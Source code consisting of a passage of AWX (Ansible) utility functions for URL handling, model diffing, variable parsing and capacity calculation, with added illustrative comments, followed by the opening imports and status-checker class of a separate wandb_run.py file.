modified_url = '@'.join(filter(None, [userpass, hostpath]))
# git+ssh scheme identifies URLs that should be converted back to
# SCP style before being passed to the git module.
parts = urllib.parse.urlsplit('git+ssh://%s' % modified_url)
# Handle local paths specified without file scheme (e.g. /path/to/foo).
# Only supported by git.
elif scm_type == 'git':
if not url.startswith('/'):
parts = urllib.parse.urlsplit('file:///%s' % url)
else:
parts = urllib.parse.urlsplit('file://%s' % url)
else:
raise ValueError(_('Invalid %s URL') % scm_type)
# Validate that scheme is valid for given scm_type.
scm_type_schemes = {
'git': ('ssh', 'git', 'git+ssh', 'http', 'https', 'ftp', 'ftps', 'file'),
'svn': ('http', 'https', 'svn', 'svn+ssh', 'file'),
'insights': ('http', 'https'),
'archive': ('http', 'https'),
}
if parts.scheme not in scm_type_schemes.get(scm_type, ()):
raise ValueError(_('Unsupported %s URL') % scm_type)
if parts.scheme == 'file' and parts.netloc not in ('', 'localhost'):
raise ValueError(_('Unsupported host "%s" for file:// URL') % (parts.netloc))
elif parts.scheme != 'file' and not parts.netloc:
raise ValueError(_('Host is required for %s URL') % parts.scheme)
if username is True:
netloc_username = parts.username or ''
elif username:
netloc_username = username
else:
netloc_username = ''
if password is True:
netloc_password = parts.password or ''
elif password:
netloc_password = password
else:
netloc_password = ''
# Special handling for github/bitbucket SSH URLs.
if check_special_cases:
special_git_hosts = ('github.com', 'bitbucket.org', 'altssh.bitbucket.org')
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_username != 'git':
raise ValueError(_('Username must be "git" for SSH access to %s.') % parts.hostname)
if scm_type == 'git' and parts.scheme.endswith('ssh') and parts.hostname in special_git_hosts and netloc_password:
# raise ValueError('Password not allowed for SSH access to %s.' % parts.hostname)
netloc_password = ''
if netloc_username and parts.scheme != 'file' and scm_type not in ("insights", "archive"):
netloc = u':'.join([urllib.parse.quote(x, safe='') for x in (netloc_username, netloc_password) if x])
else:
netloc = u''
netloc = u'@'.join(filter(None, [netloc, parts.hostname]))
if parts.port:
netloc = u':'.join([netloc, str(parts.port)])
new_url = urllib.parse.urlunsplit([parts.scheme, netloc, parts.path, parts.query, parts.fragment])
if scp_format and parts.scheme == 'git+ssh':
new_url = new_url.replace('git+ssh://', '', 1).replace('/', ':', 1)
return new_url
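# Illustrative sketch (not from the original source) of update_scm_url() behaviour;
# the repository URLs below are examples only.
#
#   update_scm_url('git', 'git@github.com:ansible/awx.git', scp_format=True)
#   # -> 'git@github.com:ansible/awx.git'   (SCP-style URL round-trips unchanged)
#
#   update_scm_url('git', 'https://user:pass@github.com/ansible/awx.git', password=False)
#   # -> 'https://user@github.com/ansible/awx.git'   (password removed, username kept)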
def get_allowed_fields(obj, serializer_mapping):
if serializer_mapping is not None and obj.__class__ in serializer_mapping:
serializer_actual = serializer_mapping[obj.__class__]()
allowed_fields = [x for x in serializer_actual.fields if not serializer_actual.fields[x].read_only] + ['id']
else:
allowed_fields = [x.name for x in obj._meta.fields]
ACTIVITY_STREAM_FIELD_EXCLUSIONS = {'user': ['last_login'], 'oauth2accesstoken': ['last_used'], 'oauth2application': ['client_secret']}
model_name = obj._meta.model_name
fields_excluded = ACTIVITY_STREAM_FIELD_EXCLUSIONS.get(model_name, [])
# see definition of from_db for CredentialType
# injection logic of managed types is incompatible with the activity stream
if model_name == 'credentialtype' and obj.managed and obj.namespace:
fields_excluded.extend(['inputs', 'injectors'])
if fields_excluded:
allowed_fields = [f for f in allowed_fields if f not in fields_excluded]
return allowed_fields
def _convert_model_field_for_display(obj, field_name, password_fields=None):
# NOTE: Careful modifying the value of field_val, as it could modify
# underlying model object field value also.
try:
field_val = getattr(obj, field_name, None)
except ObjectDoesNotExist:
return '<missing {}>-{}'.format(obj._meta.verbose_name, getattr(obj, '{}_id'.format(field_name)))
if password_fields is None:
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
if field_name in password_fields or (isinstance(field_val, str) and field_val.startswith('$encrypted$')):
return u'hidden'
if hasattr(obj, 'display_%s' % field_name):
field_val = getattr(obj, 'display_%s' % field_name)()
if isinstance(field_val, (list, dict)):
try:
field_val = json.dumps(field_val, ensure_ascii=False)
except Exception:
pass
if type(field_val) not in (bool, int, type(None)):
field_val = smart_str(field_val)
return field_val
def model_instance_diff(old, new, serializer_mapping=None):
"""
Calculate the differences between two model instances. One of the instances may be None (i.e., a newly
created model or deleted model). This will cause all fields with a value to have changed (from None).
serializer_mapping is used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary.
"""
from django.db.models import Model
if not (old is None or isinstance(old, Model)):
raise TypeError('The supplied old instance is not a valid model instance.')
if not (new is None or isinstance(new, Model)):
raise TypeError('The supplied new instance is not a valid model instance.')
old_password_fields = set(getattr(type(old), 'PASSWORD_FIELDS', [])) | set(['password'])
new_password_fields = set(getattr(type(new), 'PASSWORD_FIELDS', [])) | set(['password'])
diff = {}
allowed_fields = get_allowed_fields(new, serializer_mapping)
for field in allowed_fields:
old_value = getattr(old, field, None)
new_value = getattr(new, field, None)
if old_value != new_value:
diff[field] = (
_convert_model_field_for_display(old, field, password_fields=old_password_fields),
_convert_model_field_for_display(new, field, password_fields=new_password_fields),
)
if len(diff) == 0:
diff = None
return diff
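# Illustrative sketch (not part of the original module): comparing two versions of a
# model instance. Assumes `import copy`; the model and field values are hypothetical.
#
#   before = JobTemplate.objects.get(pk=1)
#   after = copy.copy(before)
#   after.name = 'new-name'
#   model_instance_diff(before, after)
#   # -> {'name': ('old-name', 'new-name')}   (only changed, non-read-only fields appear)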
def model_to_dict(obj, serializer_mapping=None):
"""
Serialize a model instance to a dictionary as best as possible.
serializer_mapping is used to determine read-only fields.
When provided, read-only fields will not be included in the resulting dictionary.
"""
password_fields = set(getattr(type(obj), 'PASSWORD_FIELDS', [])) | set(['password'])
attr_d = {}
allowed_fields = get_allowed_fields(obj, serializer_mapping)
for field_name in allowed_fields:
attr_d[field_name] = _convert_model_field_for_display(obj, field_name, password_fields=password_fields)
return attr_d
class CharPromptDescriptor:
"""Class used for identifying nullable launch config fields from class
ex. Schedule.limit
"""
def __init__(self, field):
self.field = field
class NullablePromptPseudoField:
"""
Interface for pseudo-property stored in `char_prompts` dict
Used in LaunchTimeConfig and submodels, defined here to avoid circular imports
"""
def __init__(self, field_name):
self.field_name = field_name
@cached_property
def field_descriptor(self):
return CharPromptDescriptor(self)
def __get__(self, instance, type=None):
if instance is None:
# for inspection on class itself
return self.field_descriptor
return instance.char_prompts.get(self.field_name, None)
def __set__(self, instance, value):
if value in (None, {}):
instance.char_prompts.pop(self.field_name, None)
else:
instance.char_prompts[self.field_name] = value
def copy_model_by_class(obj1, Class2, fields, kwargs):
"""
Creates a new unsaved object of type Class2 using the fields from obj1;
values in kwargs can override the values from obj1.
"""
create_kwargs = {}
for field_name in fields:
descriptor = getattr(Class2, field_name)
if isinstance(descriptor, ForwardManyToOneDescriptor): # ForeignKey
# Foreign keys can be specified as field_name or field_name_id.
id_field_name = '%s_id' % field_name
if field_name in kwargs:
value = kwargs[field_name]
elif id_field_name in kwargs:
value = kwargs[id_field_name]
else:
value = getattr(obj1, id_field_name)
if hasattr(value, 'id'):
value = value.id
create_kwargs[id_field_name] = value
elif isinstance(descriptor, CharPromptDescriptor):
# difficult case of copying one launch config to another launch config
new_val = None
if field_name in kwargs:
new_val = kwargs[field_name]
elif hasattr(obj1, 'char_prompts'):
if field_name in obj1.char_prompts:
new_val = obj1.char_prompts[field_name]
elif hasattr(obj1, field_name):
# extremely rare case where a template spawns a launch config - sliced jobs
new_val = getattr(obj1, field_name)
if new_val is not None:
create_kwargs.setdefault('char_prompts', {})
create_kwargs['char_prompts'][field_name] = new_val
elif isinstance(descriptor, ManyToManyDescriptor):
continue # not copied in this method
elif field_name in kwargs:
if field_name == 'extra_vars' and isinstance(kwargs[field_name], dict):
create_kwargs[field_name] = json.dumps(kwargs['extra_vars'])
elif not isinstance(Class2._meta.get_field(field_name), (ForeignObjectRel, ManyToManyField)):
create_kwargs[field_name] = kwargs[field_name]
elif hasattr(obj1, field_name):
create_kwargs[field_name] = getattr(obj1, field_name)
# Apply class-specific extra processing for origination of unified jobs
if hasattr(obj1, '_update_unified_job_kwargs') and obj1.__class__ != Class2:
new_kwargs = obj1._update_unified_job_kwargs(create_kwargs, kwargs)
else:
new_kwargs = create_kwargs
return Class2(**new_kwargs)
def copy_m2m_relationships(obj1, obj2, fields, kwargs=None):
"""
In-place operation.
Given two saved objects, copies related objects from obj1
to obj2 into the field of the same name, if the field occurs in `fields`.
"""
for field_name in fields:
if hasattr(obj1, field_name):
try:
field_obj = obj1._meta.get_field(field_name)
except FieldDoesNotExist:
continue
if isinstance(field_obj, ManyToManyField):
# Many to Many can be specified as field_name
src_field_value = getattr(obj1, field_name)
if kwargs and field_name in kwargs:
override_field_val = kwargs[field_name]
if isinstance(override_field_val, (set, list, QuerySet)):
getattr(obj2, field_name).add(*override_field_val)
continue
if override_field_val.__class__.__name__ == 'ManyRelatedManager':
src_field_value = override_field_val
dest_field = getattr(obj2, field_name)
dest_field.add(*list(src_field_value.all().values_list('id', flat=True)))
def get_type_for_model(model):
"""
Return type name for a given model class.
"""
opts = model._meta.concrete_model._meta
return camelcase_to_underscore(opts.object_name)
def get_model_for_type(type_name):
"""
Return model class for a given type name.
"""
model_str = underscore_to_camelcase(type_name)
if model_str == 'User':
use_app = 'auth'
else:
use_app = 'main'
return apps.get_model(use_app, model_str)
def get_capacity_type(uj):
'''Used for the UnifiedJob.capacity_type property; as a standalone function it also works for partial objects'''
model_name = uj._meta.concrete_model._meta.model_name
if model_name in ('job', 'inventoryupdate', 'adhoccommand', 'jobtemplate', 'inventorysource'):
return 'execution'
elif model_name == 'workflowjob':
return None
elif model_name.startswith('unified'):
raise RuntimeError(f'Capacity type is undefined for {model_name} model')
elif model_name in ('projectupdate', 'systemjob', 'project', 'systemjobtemplate'):
return 'control'
raise RuntimeError(f'Capacity type does not apply to {model_name} model')
def prefetch_page_capabilities(model, page, prefetch_list, user):
"""
Given a `page` list of objects, a nested dictionary of user_capabilities
are returned by id, ex.
{
4: {'edit': True, 'start': True},
6: {'edit': False, 'start': False}
}
Each capability is produced for all items in the page in a single query
Examples of prefetch language:
prefetch_list = ['admin', 'execute']
--> prefetch the admin (edit) and execute (start) permissions for
items in list for current user
prefetch_list = ['inventory.admin']
--> prefetch the related inventory FK permissions for current user,
and put it into the object's cache
prefetch_list = [{'copy': ['inventory.admin', 'project.admin']}]
--> prefetch logical combination of admin permission to inventory AND
project, put into cache dictionary as "copy"
"""
page_ids = [obj.id for obj in page]
mapping = {}
for obj in page:
mapping[obj.id] = {}
for prefetch_entry in prefetch_list:
display_method = None
if type(prefetch_entry) is dict:
display_method = list(prefetch_entry.keys())[0]
paths = prefetch_entry[display_method]
else:
paths = prefetch_entry
if type(paths) is not list:
paths = [paths]
# Build the query for accessible_objects according to the user & role(s)
filter_args = []
for role_path in paths:
if '.' in role_path:
res_path = '__'.join(role_path.split('.')[:-1])
role_type = role_path.split('.')[-1]
parent_model = model
for subpath in role_path.split('.')[:-1]:
parent_model = parent_model._meta.get_field(subpath).related_model
filter_args.append(
Q(Q(**{'%s__pk__in' % res_path: parent_model.accessible_pk_qs(user, '%s_role' % role_type)}) | Q(**{'%s__isnull' % res_path: True}))
)
else:
role_type = role_path
filter_args.append(Q(**{'pk__in': model.accessible_pk_qs(user, '%s_role' % role_type)}))
if display_method is None:
# Role name translation to UI names for methods
display_method = role_type
if role_type == 'admin':
display_method = 'edit'
elif role_type in ['execute', 'update']:
display_method = 'start'
# Union that query with the list of items on page
filter_args.append(Q(pk__in=page_ids))
ids_with_role = set(model.objects.filter(*filter_args).values_list('pk', flat=True))
# Save data item-by-item
for obj in page:
mapping[obj.pk][display_method] = bool(obj.pk in ids_with_role)
return mapping
def validate_vars_type(vars_obj):
if not isinstance(vars_obj, dict):
vars_type = type(vars_obj)
if hasattr(vars_type, '__name__'):
data_type = vars_type.__name__
else:
data_type = str(vars_type)
raise AssertionError(_('Input type `{data_type}` is not a dictionary').format(data_type=data_type))
def parse_yaml_or_json(vars_str, silent_failure=True):
"""
Attempt to parse a string of variables.
First with the JSON parser; if that fails, then with PyYAML.
If both attempts fail, return an empty dictionary if `silent_failure`
is True, or re-raise a combined error if `silent_failure` is False.
"""
if isinstance(vars_str, dict):
return vars_str
elif isinstance(vars_str, str) and vars_str == '""':
return {}
try:
vars_dict = json.loads(vars_str)
validate_vars_type(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err:
try:
vars_dict = yaml.safe_load(vars_str)
# Can be None if '---'
if vars_dict is None:
vars_dict = {}
validate_vars_type(vars_dict)
if not silent_failure:
# is valid YAML, check that it is compatible with JSON
try:
json.dumps(vars_dict)
except (ValueError, TypeError, AssertionError) as json_err2:
raise ParseError(_('Variables not compatible with JSON standard (error: {json_error})').format(json_error=str(json_err2)))
except (yaml.YAMLError, TypeError, AttributeError, AssertionError) as yaml_err:
if silent_failure:
return {}
raise ParseError(
_('Cannot parse as JSON (error: {json_error}) or ' 'YAML (error: {yaml_error}).').format(json_error=str(json_err), yaml_error=str(yaml_err))
)
return vars_dict
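# Illustrative examples (not from the original source):
#
#   parse_yaml_or_json('{"a": 1}')         # -> {'a': 1}               parsed as JSON
#   parse_yaml_or_json('a: 1\nb: two')     # -> {'a': 1, 'b': 'two'}   falls back to YAML
#   parse_yaml_or_json('not a mapping')    # -> {}                     silent_failure=True (default)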
def convert_cpu_str_to_decimal_cpu(cpu_str):
"""Convert a string indicating cpu units to decimal.
Useful for dealing with cpu setting that may be expressed in units compatible with
kubernetes.
See https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/#cpu-units
"""
cpu = cpu_str
millicores = False
if cpu_str[-1] == 'm':
cpu = cpu_str[:-1]
millicores = True
try:
cpu = float(cpu)
except ValueError:
cpu = 1.0
millicores = False
logger.warning(f"Could not convert SYSTEM_TASK_ABS_CPU {cpu_str} to a decimal number, falling back to default of 1 cpu")
if millicores:
cpu = cpu / 1000
# Per kubernetes docs, fractional CPU less than .1 are not allowed
return max(0.1, round(cpu, 1))
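# Illustrative examples (not from the original source), mirroring kubernetes CPU units:
#
#   convert_cpu_str_to_decimal_cpu('500m')  # -> 0.5   (millicores)
#   convert_cpu_str_to_decimal_cpu('2')     # -> 2.0
#   convert_cpu_str_to_decimal_cpu('50m')   # -> 0.1   (clamped to the 0.1 CPU minimum)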
def get_corrected_cpu(cpu_count): # formerly get_cpu_capacity
"""Some environments will do a correction to the reported CPU number
because the given OpenShift value is a lie
"""
from django.conf import settings
settings_abscpu = getattr(settings, 'SYSTEM_TASK_ABS_CPU', None)
env_abscpu = os.getenv('SYSTEM_TASK_ABS_CPU', None)
if env_abscpu is not None:
return convert_cpu_str_to_decimal_cpu(env_abscpu)
elif settings_abscpu is not None:
return convert_cpu_str_to_decimal_cpu(settings_abscpu)
return cpu_count # no correction
def get_cpu_effective_capacity(cpu_count):
from django.conf import settings
cpu_count = get_corrected_cpu(cpu_count)
settings_forkcpu = getattr(settings, 'SYSTEM_TASK_FORKS_CPU', None)
env_forkcpu = os.getenv('SYSTEM_TASK_FORKS_CPU', None)
if env_forkcpu:
forkcpu = int(env_forkcpu)
elif settings_forkcpu:
forkcpu = int(settings_forkcpu)
else:
forkcpu = 4
return max(1, int(cpu_count * forkcpu))
def convert_mem_str_to_bytes(mem_str):
"""Convert string with suffix indicating units to memory in bytes (base 2)
Useful for dealing with memory setting that may be expressed in units compatible with
kubernetes.
See https://kubernetes.io/docs/concepts/configuration/manage-resources-containers/#meaning-of-memory
"""
# If there is no suffix, the memory sourced from the request is in bytes
if mem_str.isdigit():
return int(mem_str)
conversions = {
'Ei': lambda x: x * 2**60,
'E': lambda x: x * 10**18,
'Pi': lambda x: x * 2**50,
'P': lambda x: x * 10**15,
'Ti': lambda x: x * 2**40,
'T': lambda x: x * 10**12,
'Gi': lambda x: x * 2**30,
'G': lambda x: x * 10**9,
'Mi': lambda x: x * 2**20,
'M': lambda x: x * 10**6,
'Ki': lambda x: x * 2**10,
'K': lambda x: x * 10**3,
}
mem = 0
mem_unit = None
for i, char in enumerate(mem_str):
if not char.isdigit():
mem_unit = mem_str[i:]
mem = int(mem_str[:i])
break
if not mem_unit or mem_unit not in conversions.keys():
error = f"Unsupported value for SYSTEM_TASK_ABS_MEM: {mem_str}, memory must be expressed in bytes or with known suffix: {conversions.keys()}. Falling back to 1 byte"
logger.warning(error)
return 1
return max(1, conversions[mem_unit](mem))
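# Illustrative examples (not from the original source), using kubernetes memory suffixes:
#
#   convert_mem_str_to_bytes('1Gi')    # -> 1073741824  (binary suffix, 2**30)
#   convert_mem_str_to_bytes('512M')   # -> 512000000   (decimal suffix, 512 * 10**6)
#   convert_mem_str_to_bytes('2048')   # -> 2048        (no suffix: already bytes)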
def get_corrected_memory(memory):
from django.conf import settings
settings_absmem = getattr(settings, 'SYSTEM_TASK_ABS_MEM', None)
env_absmem = os.getenv('SYSTEM_TASK_ABS_MEM', None)
# Runner returns memory in bytes
# so we convert memory from settings to bytes as well.
if env_absmem is not None:
return convert_mem_str_to_bytes(env_absmem)
elif settings_absmem is not None:
return convert_mem_str_to_bytes(settings_absmem)
return memory
def get_mem_effective_capacity(mem_bytes):
from django.conf import settings
mem_bytes = get_corrected_memory(mem_bytes)
settings_mem_mb_per_fork = getattr(settings, 'SYSTEM_TASK_FORKS_MEM', None)
env_mem_mb_per_fork = os.getenv('SYSTEM_TASK_FORKS_MEM', None)
if env_mem_mb_per_fork:
mem_mb_per_fork = int(env_mem_mb_per_fork)
elif settings_mem_mb_per_fork:
mem_mb_per_fork = int(settings_mem_mb_per_fork)
else:
mem_mb_per_fork = 100
# Per docs, deduct 2GB of memory from the available memory
# to cover memory consumption of background tasks when redis/web etc are colocated with
# the other control processes
memory_penalty_bytes = 2147483648
if settings.IS_K8S:
# In k8s, this is dealt with differently because
# redis and the web containers have their own memory allocation
memory_penalty_bytes = 0
# convert memory to megabytes because our setting of how much memory we
# should allocate per fork is in megabytes
mem_mb = (mem_bytes - memory_penalty_bytes) // 2**20
max_forks_based_on_memory = mem_mb // mem_mb_per_fork
return max(1, max_forks_based_on_memory)
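# Worked example (illustrative, not from the original source), assuming the default of
# 100 MB per fork, a non-k8s install and no SYSTEM_TASK_ABS_MEM override, with 8 GiB of
# reported memory:
#
#   mem_bytes = 8 * 2**30                 # 8589934592 bytes reported by the runner
#   (mem_bytes - 2147483648) // 2**20     # 6144 MB left after the 2 GB penalty
#   6144 // 100                           # -> 61 forks of effective memory capacity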
_inventory_updates = threading.local()
_task_manager = threading.local()
@contextlib.contextmanager
def ignore_inventory_computed_fields():
"""
Context manager to ignore updating inventory computed fields.
"""
try:
previous_value = getattr(_inventory_updates, 'is_updating', False)
_inventory_updates.is_updating = True
yield
finally:
_inventory_updates.is_updating = previous_value
def _schedule_task_manager():
from awx.main.scheduler.tasks import run_task_manager
from django.db import connection
# runs right away if not in transaction
connection.on_commit(lambda: run_task_manager.delay())
@contextlib.contextmanager
def task_manager_bulk_reschedule():
"""Context manager to avoid submitting task multiple times."""
try:
previous_flag = getattr(_task_manager, 'bulk_reschedule', False)
previous_value = getattr(_task_manager, 'needs_scheduling', False)
_task_manager.bulk_reschedule = True
_task_manager.needs_scheduling = False
yield
finally:
_task_manager.bulk_reschedule = previous_flag
if _task_manager.needs_scheduling:
_schedule_task_manager()
_task_manager.needs_scheduling = previous_value
def schedule_task_manager():
if getattr(_task_manager, 'bulk_reschedule', False):
_task_manager.needs_scheduling = True
return
_schedule_task_manager()
@contextlib.contextmanager
def ignore_inventory_group_removal():
"""
Context manager to ignore moving groups/hosts when group is deleted.
"""
try:
previous_value = getattr(_inventory_updates, 'is_removing', False)
_inventory_updates.is_removing = True
yield
finally:
_inventory_updates.is_removing = previous_value
@contextlib.contextmanager
def set_environ(**environ):
"""
Temporarily set the process environment variables.
>>> with set_environ(FOO='BAR'):
... assert os.environ['FOO'] == 'BAR'
"""
old_environ = os.environ.copy()
try:
os.environ.update(environ)
yield
finally:
os.environ.clear()
os.environ.update(old_environ)
def get_pk_from_dict(_dict, key):
"""
Helper for obtaining a pk from user data dict or None if not present.
"""
try:
val = _dict[key]
if isinstance(val, object) and hasattr(val, 'id'):
return val.id # return id if given model object
return int(val)
except (TypeError, KeyError, ValueError):
return None
class NoDefaultProvided(object):
pass
def getattrd(obj, name, default=NoDefaultProvided):
"""
Same as getattr(), but allows dot notation lookup
Discussed in:
http://stackoverflow.com/questions/11975781
"""
try:
return reduce(getattr, name.split("."), obj)
except AttributeError:
if default != NoDefaultProvided:
return default
raise
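# Illustrative sketch (not from the original source); the attribute chain is hypothetical:
#
#   getattrd(job, 'project.organization.name')     # walks job.project.organization.name
#   getattrd(job, 'missing.attr', default=None)    # -> None instead of raising AttributeError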
def getattr_dne(obj, name, notfound=ObjectDoesNotExist):
try:
return getattr(obj, name)
except notfound:
return None
current_apps = apps
def set_current_apps(apps):
global current_apps
current_apps = apps
def get_current_apps():
global current_apps
return current_apps
def get_custom_venv_choices():
from django.conf import settings
all_venv_paths = settings.CUSTOM_VENV_PATHS + [settings.BASE_VENV_PATH]
custom_venv_choices = []
for venv_path in all_venv_paths:
if os.path.exists(venv_path):
for d in os.listdir(venv_path):
if venv_path == settings.BASE_VENV_PATH and d == 'awx':
continue
if os.path.exists(os.path.join(venv_path, d, 'bin', 'pip')):
custom_venv_choices.append(os.path.join(venv_path, d))
return custom_venv_choices
def get_custom_venv_pip_freeze(venv_path):
pip_path = os.path.join(venv_path, 'bin', 'pip')
try:
freeze_data = subprocess.run([pip_path, "freeze"], capture_output=True)
pip_data = (freeze_data.stdout).decode('UTF-8')
return pip_data
except Exception:
logger.exception("Encountered an error while trying to run 'pip freeze' for custom virtual environments:")
def is_ansible_variable(key):
return key.startswith('ansible_')
def extract_ansible_vars(extra_vars):
extra_vars = parse_yaml_or_json(extra_vars)
ansible_vars = set([])
for key in list(extra_vars.keys()):
if is_ansible_variable(key):
extra_vars.pop(key)
ansible_vars.add(key)
return (extra_vars, ansible_vars)
def get_search_fields(model):
fields = []
for field in model._meta.fields:
if field.name in ('username', 'first_name', 'last_name', 'email', 'name', 'description'):
fields.append(field.name)
return fields
def has_model_field_prefetched(model_obj, field_name):
# NOTE: Update this function if django internal implementation changes.
return getattr(getattr(model_obj, field_name, None), 'prefetch_cache_name', '') in getattr(model_obj, '_prefetched_objects_cache', {})
def get_external_account(user):
from django.conf import settings
account_type = None
if getattr(settings, 'AUTH_LDAP_SERVER_URI', None):
try:
if user.pk and user.profile.ldap_dn and not user.has_usable_password():
account_type = "ldap"
except AttributeError:
pass
if (
getattr(settings, 'SOCIAL_AUTH_GOOGLE_OAUTH2_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_ORG_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_GITHUB_TEAM_KEY', None)
or getattr(settings, 'SOCIAL_AUTH_SAML_ENABLED_IDPS', None)
) and user.social_auth.all():
account_type = "social"
if (getattr(settings, 'RADIUS_SERVER', None) or getattr(settings, 'TACACSPLUS_HOST', None)) and user.enterprise_auth.all():
account_type = "enterprise"
return account_type
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
def create_temporary_fifo(data):
"""Open fifo named pipe in a new thread using a temporary file path. The
thread blocks until data is read from the pipe.
Returns the path to the fifo.
:param data(bytes): Data to write to the pipe.
"""
path = os.path.join(tempfile.mkdtemp(), next(tempfile._get_candidate_names()))
os.mkfifo(path, stat.S_IRUSR | stat.S_IWUSR)
threading.Thread(target=lambda p, d: open(p, 'wb').write(d), args=(path, data)).start()
return path
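# Illustrative sketch (not part of the original module): passing a secret to a
# subprocess without writing it to a regular file. The command name is hypothetical.
#
#   path = create_temporary_fifo(b'hunter2\n')
#   subprocess.run(['some-tool', '--password-file', path])
#   # the writer thread blocks until some-tool opens the fifo for reading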
def truncate_stdout(stdout, size):
from awx.main.constants import ANSI_SGR_PATTERN
if size <= 0 or len(stdout) <= size:
return stdout
stdout = stdout[: (size - 1)] + u'\u2026'
set_count, reset_count = 0, 0
for m in ANSI_SGR_PATTERN.finditer(stdout):
if m.group() == u'\u001b[0m':
reset_count += 1
else:
set_count += 1
return stdout + u'\u001b[0m' * (set_count - reset_count)
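# Illustrative example (not from the original source): when the cut drops a trailing
# ANSI reset, a matching reset is appended so colours do not bleed into later output.
#
#   truncate_stdout(u'\u001b[31m' + u'x' * 20 + u'\u001b[0m', 10)
#   # -> u'\u001b[31mxxxx\u2026\u001b[0m'   (9 chars kept + ellipsis + re-added reset)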
def deepmerge(a, b):
"""
Merge dict structures and return the result.
>>> a = {'first': {'all_rows': {'pass': 'dog', 'number': '1'}}}
>>> b = {'first': {'all_rows': {'fail': 'cat', 'number': '5'}}}
>>> import pprint; pprint.pprint(deepmerge(a, b))
{'first': {'all_rows': {'fail': 'cat', 'number': '5', 'pass': 'dog'}}}
"""
if isinstance(a, dict) and isinstance(b, dict):
return dict([(k, deepmerge(a.get(k), b.get(k))) for k in set(a.keys()).union(b.keys())])
elif b is None:
return a
else:
return b
def create_partition(tblname, start=None, end=None, partition_label=None, minutely=False):
"""Creates new partition table for events.
- start defaults to beginning of current hour
- end defaults to end of current hour
- partition_label defaults to YYYYMMDD_HH
- minutely will create partitions that span _a single minute_ for testing purposes
"""
current_time = now()
if not start:
if minutely:
start = current_time.replace(microsecond=0, second=0)
else:
start = current_time.replace(microsecond=0, second=0, minute=0)
if not end:
if minutely:
end = start.replace(microsecond=0, second=0) + timedelta(minutes=1)
else:
end = start.replace(microsecond=0, second=0, minute=0) + timedelta(hours=1)
start_timestamp = str(start)
end_timestamp = str(end)
if not partition_label:
if minutely:
partition_label = start.strftime('%Y%m%d_%H%M')
else:
partition_label = start.strftime('%Y%m%d_%H')
with connection.cursor() as cursor:
cursor.execute(
f'CREATE TABLE IF NOT EXISTS {tblname}_{partition_label} '
f'PARTITION OF {tblname} '
f'FOR VALUES FROM (\'{start_timestamp}\') to (\'{end_timestamp}\');'
)
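# Illustrative sketch (not from the original source): for a hypothetical 'main_jobevent'
# table and the default hourly window, the generated DDL looks roughly like
#
#   CREATE TABLE IF NOT EXISTS main_jobevent_20240101_13
#   PARTITION OF main_jobevent
#   FOR VALUES FROM ('2024-01-01 13:00:00+00:00') to ('2024-01-01 14:00:00+00:00');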
def cleanup_new_process(func):
"""
Clean up the Django database connection and cache connection before executing func, the entry point of a new thread or process.
"""
@wraps(func)
def wrapper_cleanup_new_process(*args, **kwargs):
from awx.conf.settings import SettingsWrapper # noqa
django_connection.close()
django_cache.close()
SettingsWrapper.initialize()
return func(*args, **kwargs)
return wrapper_cleanup_new_process
|
wandb_run.py
|
import atexit
from datetime import timedelta
from enum import IntEnum
import glob
import json
import logging
import numbers
import os
import platform
import re
import sys
import threading
import time
import traceback
from types import TracebackType
from typing import (
Any,
Callable,
Dict,
List,
NamedTuple,
Optional,
Sequence,
TextIO,
Tuple,
Type,
Union,
)
from typing import TYPE_CHECKING
import click
import requests
from six import iteritems, string_types
from six.moves import _thread as thread
from six.moves.collections_abc import Mapping
from six.moves.urllib.parse import quote as url_quote
from six.moves.urllib.parse import urlencode
import wandb
from wandb import errors
from wandb import trigger
from wandb._globals import _datatypes_set_callback
from wandb.apis import internal, public
from wandb.apis.public import Api as PublicApi
from wandb.proto.wandb_internal_pb2 import (
FilePusherStats,
MetricRecord,
PollExitResponse,
RunRecord,
)
from wandb.util import (
add_import_hook,
is_unicode_safe,
sentry_set_scope,
to_forward_slash_path,
)
from wandb.viz import (
create_custom_chart,
custom_chart_panel_config,
CustomChart,
Visualize,
)
from . import wandb_artifacts
from . import wandb_config
from . import wandb_history
from . import wandb_metric
from . import wandb_summary
from .interface.artifacts import Artifact as ArtifactInterface
from .interface.interface import InterfaceBase
from .interface.summary_record import SummaryRecord
from .lib import (
apikey,
config_util,
deprecate,
filenames,
filesystem,
ipython,
module,
proto_util,
redirect,
sparkline,
telemetry,
)
from .lib.exit_hooks import ExitHooks
from .lib.git import GitRepo
from .lib.reporting import Reporter
from .wandb_artifacts import Artifact
from .wandb_settings import Settings, SettingsConsole
from .wandb_setup import _WandbSetup
if TYPE_CHECKING:
from .data_types import WBValue
from .wandb_alerts import AlertLevel
from .interface.artifacts import (
ArtifactEntry,
ArtifactManifest,
)
logger = logging.getLogger("wandb")
EXIT_TIMEOUT = 60
RUN_NAME_COLOR = "#cdcd00"
RE_LABEL = re.compile(r"[a-zA-Z0-9_-]+$")
class TeardownStage(IntEnum):
EARLY = 1
LATE = 2
class TeardownHook(NamedTuple):
call: Callable[[], None]
stage: TeardownStage
class RunStatusChecker(object):
"""Periodically polls the background process for relevant updates.
For now, we just use this to figure out if the user has requested a stop.
"""
def __init__(
self,
interface: InterfaceBase,
stop_polling_interval: int = 15,
retry_polling_interval: int = 5,
) -> None:
self._interface = interface
self._stop_polling_interval = stop_polling_interval
self._retry_polling_interval = retry_polling_interval
self._join_event = threading.Event()
self._stop_thread = threading.Thread(target=self.check_status)
self._stop_thread.name = "ChkStopThr"
self._stop_thread.daemon = True
self._stop_thread.start()
self._retry_thread = threading.Thread(target=self.check_network_status)
self._retry_thread.name = "NetStatThr"
self._retry_thread.daemon = True
self._retry_thread.start()
def check_network_status(self) -> None:
join_requested = False
while not join_requested:
status_response = self._interface.communicate_network_status()
if status_response and status_response.network_responses:
for hr in status_response.network_responses:
if (
hr.http_status_code == 200 or hr.http_status_code == 0
